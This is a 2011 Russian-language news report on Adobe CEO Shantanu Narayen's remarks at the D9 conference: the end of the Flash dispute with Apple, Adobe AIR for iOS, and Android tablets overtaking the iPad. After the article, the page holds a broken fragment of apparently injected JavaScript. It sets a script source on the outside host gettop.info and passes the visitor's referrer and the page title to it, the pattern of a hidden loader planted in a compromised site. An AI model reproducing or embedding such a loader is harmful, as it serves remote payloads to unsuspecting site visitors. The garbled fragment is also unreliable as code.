И снова про вражду Adobe и Apple

04.06.2011, Новости, Кирилл Копылов

Генеральный директор Adobe Шантану Нарайен заявил в четверг, что размолвка между Apple и его компанией в связи с отсутствием Adobe Flash на iOS завершилась, а также предсказал, что в скором времени планшеты, работающие на системе Google Android, займут лидирующие позиции на рынке по сравнению с iPad.

Нарайен также сделал несколько комментариев со сцены в интервью с журналистом Уолтом Моссбергом на конференции D9, организованной All Things D. На вопрос Моссберга, завершен ли «флэшевский спор» между Adobe и Apple, директор сказал: «Абсолютно завершен».

Генеральный директор Apple Стив Джобс и Нарайен ввязались в публичную словесную войну в прошлом году. В прошлом году, Джобс опубликовал открытое письмо, обвиняя Adobe Flash в недостаточном представлении системы на мобильных устройствах. Нарайен открыл ответный огонь своим письмом дискредитируя комментарии Джобса и обвиняя Apple,в том,ч то их ОС из-за множественных багов не приспособлены для Flash.

Во время интервью в четверг, Нарайен утверждал, что разногласия между двумя компаниями не касались в конечном итоге технологии. «Это вопрос бизнес-модели и контроля платформы», — сказал он.

Нарайен не забыл напомнить о мультиплатформенной стратегии Adobe, отметив, что приложения, скомпилированные в Adobe AIR, могут быть легко преобразованы для IOS и Apple’s App Store. По его словам, Apple санкционировала такие приложения, поскольку это «по-прежнему вопросы контроля бизнес-модели».

Генеральный директор Adobe отметил также, что Flash будет присутствовать в 130 миллионах телефонных устройств к концу года. Однако, вмешавшийся Моссберг добавил, что он «еще ни протестировал ни одного устройства, где бы Flash работал очень хорошо».

Нарайен сравнил себя с «ребенком в магазине конфет», когда он работает с компаниями, производящими планшеты без iPad. «Я думаю, что потребители постоянно меняют предпочтения, чему я очень рад», — сказал он.

«Существует больше возможностей на этих устройствах, чем когда мы устанавливали Photoshop на компьютере несколько лет назад», — сказал Нарайен. «Таким образом, мы четко делаем ставки на эти устройства не только в плане спроса на них, но и на производительность и полезность устройств для нашего потребителя». Нарайен пообещал, что Adobe будет приносить все свои творческие приложения к их планшетам.

По словам Нарайена так же как и смартфоны, Android, который поддерживает Flash, в скором времени, достигнет «точки перегиба» с планшетами и перегонит iPad. Он также считает, что HP и RIM набирает обороты в выпуске планшетов.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

} else {

Читайте также:

  1. Они сделали это снова

Оставить комментарий

Обязательно.

Обязательно. Не публикуется.